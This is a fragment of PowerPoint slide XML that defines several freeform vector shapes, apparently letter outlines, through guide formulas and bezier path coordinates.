                <a:gd name="T29" fmla="*/ 222 h 222"/>
                <a:gd name="T30" fmla="*/ 155 w 233"/>
                <a:gd name="T31" fmla="*/ 203 h 222"/>
                <a:gd name="T32" fmla="*/ 149 w 233"/>
                <a:gd name="T33" fmla="*/ 111 h 222"/>
                <a:gd name="T34" fmla="*/ 149 w 233"/>
                <a:gd name="T35" fmla="*/ 152 h 222"/>
                <a:gd name="T36" fmla="*/ 130 w 233"/>
                <a:gd name="T37" fmla="*/ 183 h 222"/>
                <a:gd name="T38" fmla="*/ 85 w 233"/>
                <a:gd name="T39" fmla="*/ 192 h 222"/>
                <a:gd name="T40" fmla="*/ 34 w 233"/>
                <a:gd name="T41" fmla="*/ 155 h 222"/>
                <a:gd name="T42" fmla="*/ 149 w 233"/>
                <a:gd name="T43" fmla="*/ 11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3" h="222">
                  <a:moveTo>
                    <a:pt x="155" y="203"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="219"/>
                    <a:pt x="190" y="219"/>
                    <a:pt x="208" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="222" y="219"/>
                    <a:pt x="233" y="219"/>
                    <a:pt x="233" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="189"/>
                    <a:pt x="221" y="189"/>
                    <a:pt x="213" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="189"/>
                    <a:pt x="188" y="186"/>
                    <a:pt x="184" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="77"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="42"/>
                    <a:pt x="157" y="0"/>
                    <a:pt x="85" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="0"/>
                    <a:pt x="13" y="0"/>
                    <a:pt x="13" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="51"/>
                    <a:pt x="23" y="59"/>
                    <a:pt x="35" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="59"/>
                    <a:pt x="56" y="55"/>
                    <a:pt x="57" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="32"/>
                    <a:pt x="57" y="32"/>
                    <a:pt x="67" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="30"/>
                    <a:pt x="81" y="30"/>
                    <a:pt x="85" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="30"/>
                    <a:pt x="149" y="46"/>
                    <a:pt x="149" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="83"/>
                    <a:pt x="0" y="108"/>
                    <a:pt x="0" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="190"/>
                    <a:pt x="31" y="222"/>
                    <a:pt x="82" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="222"/>
                    <a:pt x="131" y="219"/>
                    <a:pt x="155" y="203"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="149" y="111"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="149" y="152"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="149" y="164"/>
                    <a:pt x="149" y="174"/>
                    <a:pt x="130" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="192"/>
                    <a:pt x="89" y="192"/>
                    <a:pt x="85" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="192"/>
                    <a:pt x="34" y="175"/>
                    <a:pt x="34" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="131"/>
                    <a:pt x="77" y="113"/>
                    <a:pt x="149" y="11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02" name="Freeform 243">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{142BBDF0-BC66-432F-ACF9-FC0A511E9EAE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId43"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4830764" y="3232151"/>
              <a:ext cx="90488" cy="123825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 98 w 212"/>
                <a:gd name="T1" fmla="*/ 92 h 279"/>
                <a:gd name="T2" fmla="*/ 180 w 212"/>
                <a:gd name="T3" fmla="*/ 92 h 279"/>
                <a:gd name="T4" fmla="*/ 200 w 212"/>
                <a:gd name="T5" fmla="*/ 77 h 279"/>
                <a:gd name="T6" fmla="*/ 180 w 212"/>
                <a:gd name="T7" fmla="*/ 61 h 279"/>
                <a:gd name="T8" fmla="*/ 98 w 212"/>
                <a:gd name="T9" fmla="*/ 61 h 279"/>
                <a:gd name="T10" fmla="*/ 98 w 212"/>
                <a:gd name="T11" fmla="*/ 20 h 279"/>
                <a:gd name="T12" fmla="*/ 81 w 212"/>
                <a:gd name="T13" fmla="*/ 0 h 279"/>
                <a:gd name="T14" fmla="*/ 64 w 212"/>
                <a:gd name="T15" fmla="*/ 20 h 279"/>
                <a:gd name="T16" fmla="*/ 64 w 212"/>
                <a:gd name="T17" fmla="*/ 61 h 279"/>
                <a:gd name="T18" fmla="*/ 21 w 212"/>
                <a:gd name="T19" fmla="*/ 61 h 279"/>
                <a:gd name="T20" fmla="*/ 0 w 212"/>
                <a:gd name="T21" fmla="*/ 77 h 279"/>
                <a:gd name="T22" fmla="*/ 20 w 212"/>
                <a:gd name="T23" fmla="*/ 92 h 279"/>
                <a:gd name="T24" fmla="*/ 64 w 212"/>
                <a:gd name="T25" fmla="*/ 92 h 279"/>
                <a:gd name="T26" fmla="*/ 64 w 212"/>
                <a:gd name="T27" fmla="*/ 213 h 279"/>
                <a:gd name="T28" fmla="*/ 134 w 212"/>
                <a:gd name="T29" fmla="*/ 279 h 279"/>
                <a:gd name="T30" fmla="*/ 212 w 212"/>
                <a:gd name="T31" fmla="*/ 213 h 279"/>
                <a:gd name="T32" fmla="*/ 194 w 212"/>
                <a:gd name="T33" fmla="*/ 194 h 279"/>
                <a:gd name="T34" fmla="*/ 177 w 212"/>
                <a:gd name="T35" fmla="*/ 213 h 279"/>
                <a:gd name="T36" fmla="*/ 137 w 212"/>
                <a:gd name="T37" fmla="*/ 249 h 279"/>
                <a:gd name="T38" fmla="*/ 98 w 212"/>
                <a:gd name="T39" fmla="*/ 210 h 279"/>
                <a:gd name="T40" fmla="*/ 98 w 212"/>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79">
                  <a:moveTo>
                    <a:pt x="98" y="92"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="180" y="92"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="92"/>
                    <a:pt x="200" y="92"/>
                    <a:pt x="200" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="61"/>
                    <a:pt x="188" y="61"/>
                    <a:pt x="180" y="61"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="11"/>
                    <a:pt x="98" y="0"/>
                    <a:pt x="81" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="64" y="10"/>
                    <a:pt x="64" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="61"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="61"/>
                    <a:pt x="0" y="61"/>
                    <a:pt x="0" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="92"/>
                    <a:pt x="13" y="92"/>
                    <a:pt x="20" y="92"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="213"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="261"/>
                    <a:pt x="98" y="279"/>
                    <a:pt x="134" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="279"/>
                    <a:pt x="212" y="258"/>
                    <a:pt x="212" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="204"/>
                    <a:pt x="212" y="194"/>
                    <a:pt x="194" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="194"/>
                    <a:pt x="177" y="204"/>
                    <a:pt x="177" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="244"/>
                    <a:pt x="148" y="249"/>
                    <a:pt x="137" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="249"/>
                    <a:pt x="98" y="223"/>
                    <a:pt x="98" y="210"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98"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03" name="Freeform 244">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE8210AC-9024-44CD-B3CA-76BB7CF6D71E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId44"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4941889" y="3232151"/>
              <a:ext cx="88900" cy="123825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 98 w 211"/>
                <a:gd name="T1" fmla="*/ 92 h 279"/>
                <a:gd name="T2" fmla="*/ 180 w 211"/>
                <a:gd name="T3" fmla="*/ 92 h 279"/>
                <a:gd name="T4" fmla="*/ 200 w 211"/>
                <a:gd name="T5" fmla="*/ 77 h 279"/>
                <a:gd name="T6" fmla="*/ 180 w 211"/>
                <a:gd name="T7" fmla="*/ 61 h 279"/>
                <a:gd name="T8" fmla="*/ 98 w 211"/>
                <a:gd name="T9" fmla="*/ 61 h 279"/>
                <a:gd name="T10" fmla="*/ 98 w 211"/>
                <a:gd name="T11" fmla="*/ 20 h 279"/>
                <a:gd name="T12" fmla="*/ 81 w 211"/>
                <a:gd name="T13" fmla="*/ 0 h 279"/>
                <a:gd name="T14" fmla="*/ 64 w 211"/>
                <a:gd name="T15" fmla="*/ 20 h 279"/>
                <a:gd name="T16" fmla="*/ 64 w 211"/>
                <a:gd name="T17" fmla="*/ 61 h 279"/>
                <a:gd name="T18" fmla="*/ 20 w 211"/>
                <a:gd name="T19" fmla="*/ 61 h 279"/>
                <a:gd name="T20" fmla="*/ 0 w 211"/>
                <a:gd name="T21" fmla="*/ 77 h 279"/>
                <a:gd name="T22" fmla="*/ 20 w 211"/>
                <a:gd name="T23" fmla="*/ 92 h 279"/>
                <a:gd name="T24" fmla="*/ 64 w 211"/>
                <a:gd name="T25" fmla="*/ 92 h 279"/>
                <a:gd name="T26" fmla="*/ 64 w 211"/>
                <a:gd name="T27" fmla="*/ 213 h 279"/>
                <a:gd name="T28" fmla="*/ 134 w 211"/>
                <a:gd name="T29" fmla="*/ 279 h 279"/>
                <a:gd name="T30" fmla="*/ 211 w 211"/>
                <a:gd name="T31" fmla="*/ 213 h 279"/>
                <a:gd name="T32" fmla="*/ 194 w 211"/>
                <a:gd name="T33" fmla="*/ 194 h 279"/>
                <a:gd name="T34" fmla="*/ 177 w 211"/>
                <a:gd name="T35" fmla="*/ 213 h 279"/>
                <a:gd name="T36" fmla="*/ 136 w 211"/>
                <a:gd name="T37" fmla="*/ 249 h 279"/>
                <a:gd name="T38" fmla="*/ 98 w 211"/>
                <a:gd name="T39" fmla="*/ 210 h 279"/>
                <a:gd name="T40" fmla="*/ 98 w 211"/>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 h="279">
                  <a:moveTo>
                    <a:pt x="98" y="92"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="180" y="92"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="92"/>
                    <a:pt x="200" y="92"/>
                    <a:pt x="200" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="61"/>
                    <a:pt x="188" y="61"/>
                    <a:pt x="180" y="61"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="11"/>
                    <a:pt x="98" y="0"/>
                    <a:pt x="81" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="64" y="10"/>
                    <a:pt x="64" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="61"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="61"/>
                    <a:pt x="0" y="61"/>
                    <a:pt x="0" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="92"/>
                    <a:pt x="12" y="92"/>
                    <a:pt x="20" y="92"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="213"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="261"/>
                    <a:pt x="97" y="279"/>
                    <a:pt x="134" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="279"/>
                    <a:pt x="211" y="258"/>
                    <a:pt x="211" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="204"/>
                    <a:pt x="211" y="194"/>
                    <a:pt x="194" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="194"/>
                    <a:pt x="177" y="204"/>
                    <a:pt x="177" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="244"/>
                    <a:pt x="148" y="249"/>
                    <a:pt x="136" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="249"/>
                    <a:pt x="98" y="223"/>
                    <a:pt x="98" y="210"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98"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04" name="Freeform 245">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9222900-F1BC-4A38-AD85-98E8DEFD956D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId45"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5059364" y="3257551"/>
              <a:ext cx="98425" cy="98425"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 155 w 234"/>
                <a:gd name="T1" fmla="*/ 203 h 222"/>
                <a:gd name="T2" fmla="*/ 209 w 234"/>
                <a:gd name="T3" fmla="*/ 219 h 222"/>
                <a:gd name="T4" fmla="*/ 234 w 234"/>
                <a:gd name="T5" fmla="*/ 204 h 222"/>
                <a:gd name="T6" fmla="*/ 214 w 234"/>
                <a:gd name="T7" fmla="*/ 189 h 222"/>
                <a:gd name="T8" fmla="*/ 184 w 234"/>
                <a:gd name="T9" fmla="*/ 185 h 222"/>
                <a:gd name="T10" fmla="*/ 184 w 234"/>
                <a:gd name="T11" fmla="*/ 77 h 222"/>
                <a:gd name="T12" fmla="*/ 85 w 234"/>
                <a:gd name="T13" fmla="*/ 0 h 222"/>
                <a:gd name="T14" fmla="*/ 13 w 234"/>
                <a:gd name="T15" fmla="*/ 36 h 222"/>
                <a:gd name="T16" fmla="*/ 36 w 234"/>
                <a:gd name="T17" fmla="*/ 59 h 222"/>
                <a:gd name="T18" fmla="*/ 57 w 234"/>
                <a:gd name="T19" fmla="*/ 36 h 222"/>
                <a:gd name="T20" fmla="*/ 68 w 234"/>
                <a:gd name="T21" fmla="*/ 31 h 222"/>
                <a:gd name="T22" fmla="*/ 86 w 234"/>
                <a:gd name="T23" fmla="*/ 30 h 222"/>
                <a:gd name="T24" fmla="*/ 150 w 234"/>
                <a:gd name="T25" fmla="*/ 81 h 222"/>
                <a:gd name="T26" fmla="*/ 0 w 234"/>
                <a:gd name="T27" fmla="*/ 155 h 222"/>
                <a:gd name="T28" fmla="*/ 82 w 234"/>
                <a:gd name="T29" fmla="*/ 222 h 222"/>
                <a:gd name="T30" fmla="*/ 155 w 234"/>
                <a:gd name="T31" fmla="*/ 203 h 222"/>
                <a:gd name="T32" fmla="*/ 150 w 234"/>
                <a:gd name="T33" fmla="*/ 111 h 222"/>
                <a:gd name="T34" fmla="*/ 150 w 234"/>
                <a:gd name="T35" fmla="*/ 152 h 222"/>
                <a:gd name="T36" fmla="*/ 130 w 234"/>
                <a:gd name="T37" fmla="*/ 183 h 222"/>
                <a:gd name="T38" fmla="*/ 86 w 234"/>
                <a:gd name="T39" fmla="*/ 192 h 222"/>
                <a:gd name="T40" fmla="*/ 35 w 234"/>
                <a:gd name="T41" fmla="*/ 155 h 222"/>
                <a:gd name="T42" fmla="*/ 150 w 234"/>
                <a:gd name="T43" fmla="*/ 11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4" h="222">
                  <a:moveTo>
                    <a:pt x="155" y="203"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="219"/>
                    <a:pt x="190" y="219"/>
                    <a:pt x="209" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="219"/>
                    <a:pt x="234" y="219"/>
                    <a:pt x="234" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="189"/>
                    <a:pt x="222" y="189"/>
                    <a:pt x="214" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="189"/>
                    <a:pt x="188" y="186"/>
                    <a:pt x="184" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="77"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="42"/>
                    <a:pt x="157" y="0"/>
                    <a:pt x="85" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="13" y="0"/>
                    <a:pt x="13" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="51"/>
                    <a:pt x="24" y="59"/>
                    <a:pt x="36" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="59"/>
                    <a:pt x="57" y="55"/>
                    <a:pt x="57" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="32"/>
                    <a:pt x="58" y="32"/>
                    <a:pt x="68" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="30"/>
                    <a:pt x="81" y="30"/>
                    <a:pt x="86" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="30"/>
                    <a:pt x="150" y="46"/>
                    <a:pt x="150" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="83"/>
                    <a:pt x="0" y="108"/>
                    <a:pt x="0" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="190"/>
                    <a:pt x="32" y="222"/>
                    <a:pt x="82" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="222"/>
                    <a:pt x="132" y="219"/>
                    <a:pt x="155" y="203"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="150" y="111"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="150" y="152"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="164"/>
                    <a:pt x="150" y="174"/>
                    <a:pt x="130" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="192"/>
                    <a:pt x="90" y="192"/>
                    <a:pt x="86" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="192"/>
                    <a:pt x="35" y="175"/>
                    <a:pt x="35" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="131"/>
                    <a:pt x="77" y="113"/>
                    <a:pt x="150" y="11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05" name="Freeform 246">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E51DBFBD-61AC-4010-B3EA-6F390A750E59}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId46"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5173664" y="3257551"/>
              <a:ext cx="82550" cy="98425"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 196 w 196"/>
                <a:gd name="T1" fmla="*/ 165 h 222"/>
                <a:gd name="T2" fmla="*/ 178 w 196"/>
                <a:gd name="T3" fmla="*/ 151 h 222"/>
                <a:gd name="T4" fmla="*/ 162 w 196"/>
                <a:gd name="T5" fmla="*/ 162 h 222"/>
                <a:gd name="T6" fmla="*/ 112 w 196"/>
                <a:gd name="T7" fmla="*/ 192 h 222"/>
                <a:gd name="T8" fmla="*/ 34 w 196"/>
                <a:gd name="T9" fmla="*/ 111 h 222"/>
                <a:gd name="T10" fmla="*/ 115 w 196"/>
                <a:gd name="T11" fmla="*/ 30 h 222"/>
                <a:gd name="T12" fmla="*/ 145 w 196"/>
                <a:gd name="T13" fmla="*/ 35 h 222"/>
                <a:gd name="T14" fmla="*/ 167 w 196"/>
                <a:gd name="T15" fmla="*/ 59 h 222"/>
                <a:gd name="T16" fmla="*/ 190 w 196"/>
                <a:gd name="T17" fmla="*/ 36 h 222"/>
                <a:gd name="T18" fmla="*/ 115 w 196"/>
                <a:gd name="T19" fmla="*/ 0 h 222"/>
                <a:gd name="T20" fmla="*/ 0 w 196"/>
                <a:gd name="T21" fmla="*/ 111 h 222"/>
                <a:gd name="T22" fmla="*/ 109 w 196"/>
                <a:gd name="T23" fmla="*/ 222 h 222"/>
                <a:gd name="T24" fmla="*/ 196 w 196"/>
                <a:gd name="T25"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22">
                  <a:moveTo>
                    <a:pt x="196" y="165"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="151"/>
                    <a:pt x="181" y="151"/>
                    <a:pt x="178" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="151"/>
                    <a:pt x="165" y="152"/>
                    <a:pt x="162" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="168"/>
                    <a:pt x="149" y="192"/>
                    <a:pt x="112" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="192"/>
                    <a:pt x="34" y="157"/>
                    <a:pt x="34" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="88"/>
                    <a:pt x="48" y="30"/>
                    <a:pt x="115" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="30"/>
                    <a:pt x="145" y="30"/>
                    <a:pt x="145" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="52"/>
                    <a:pt x="155" y="59"/>
                    <a:pt x="167" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="59"/>
                    <a:pt x="190" y="51"/>
                    <a:pt x="190" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="0"/>
                    <a:pt x="138" y="0"/>
                    <a:pt x="115" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="0"/>
                    <a:pt x="0" y="68"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="171"/>
                    <a:pt x="47" y="222"/>
                    <a:pt x="109" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="222"/>
                    <a:pt x="196" y="173"/>
                    <a:pt x="196"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06" name="Freeform 247">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40344341-25CF-4B8E-B7E8-55E20A0EA013}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId47"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5272089" y="3221038"/>
              <a:ext cx="103188" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 133 w 243"/>
                <a:gd name="T1" fmla="*/ 177 h 304"/>
                <a:gd name="T2" fmla="*/ 194 w 243"/>
                <a:gd name="T3" fmla="*/ 120 h 304"/>
                <a:gd name="T4" fmla="*/ 212 w 243"/>
                <a:gd name="T5" fmla="*/ 120 h 304"/>
                <a:gd name="T6" fmla="*/ 232 w 243"/>
                <a:gd name="T7" fmla="*/ 105 h 304"/>
                <a:gd name="T8" fmla="*/ 212 w 243"/>
                <a:gd name="T9" fmla="*/ 89 h 304"/>
                <a:gd name="T10" fmla="*/ 135 w 243"/>
                <a:gd name="T11" fmla="*/ 89 h 304"/>
                <a:gd name="T12" fmla="*/ 115 w 243"/>
                <a:gd name="T13" fmla="*/ 105 h 304"/>
                <a:gd name="T14" fmla="*/ 135 w 243"/>
                <a:gd name="T15" fmla="*/ 120 h 304"/>
                <a:gd name="T16" fmla="*/ 153 w 243"/>
                <a:gd name="T17" fmla="*/ 120 h 304"/>
                <a:gd name="T18" fmla="*/ 73 w 243"/>
                <a:gd name="T19" fmla="*/ 196 h 304"/>
                <a:gd name="T20" fmla="*/ 73 w 243"/>
                <a:gd name="T21" fmla="*/ 20 h 304"/>
                <a:gd name="T22" fmla="*/ 53 w 243"/>
                <a:gd name="T23" fmla="*/ 0 h 304"/>
                <a:gd name="T24" fmla="*/ 20 w 243"/>
                <a:gd name="T25" fmla="*/ 0 h 304"/>
                <a:gd name="T26" fmla="*/ 0 w 243"/>
                <a:gd name="T27" fmla="*/ 14 h 304"/>
                <a:gd name="T28" fmla="*/ 20 w 243"/>
                <a:gd name="T29" fmla="*/ 30 h 304"/>
                <a:gd name="T30" fmla="*/ 45 w 243"/>
                <a:gd name="T31" fmla="*/ 30 h 304"/>
                <a:gd name="T32" fmla="*/ 45 w 243"/>
                <a:gd name="T33" fmla="*/ 274 h 304"/>
                <a:gd name="T34" fmla="*/ 20 w 243"/>
                <a:gd name="T35" fmla="*/ 274 h 304"/>
                <a:gd name="T36" fmla="*/ 0 w 243"/>
                <a:gd name="T37" fmla="*/ 289 h 304"/>
                <a:gd name="T38" fmla="*/ 20 w 243"/>
                <a:gd name="T39" fmla="*/ 304 h 304"/>
                <a:gd name="T40" fmla="*/ 97 w 243"/>
                <a:gd name="T41" fmla="*/ 304 h 304"/>
                <a:gd name="T42" fmla="*/ 117 w 243"/>
                <a:gd name="T43" fmla="*/ 289 h 304"/>
                <a:gd name="T44" fmla="*/ 97 w 243"/>
                <a:gd name="T45" fmla="*/ 274 h 304"/>
                <a:gd name="T46" fmla="*/ 73 w 243"/>
                <a:gd name="T47" fmla="*/ 274 h 304"/>
                <a:gd name="T48" fmla="*/ 73 w 243"/>
                <a:gd name="T49" fmla="*/ 233 h 304"/>
                <a:gd name="T50" fmla="*/ 112 w 243"/>
                <a:gd name="T51" fmla="*/ 196 h 304"/>
                <a:gd name="T52" fmla="*/ 172 w 243"/>
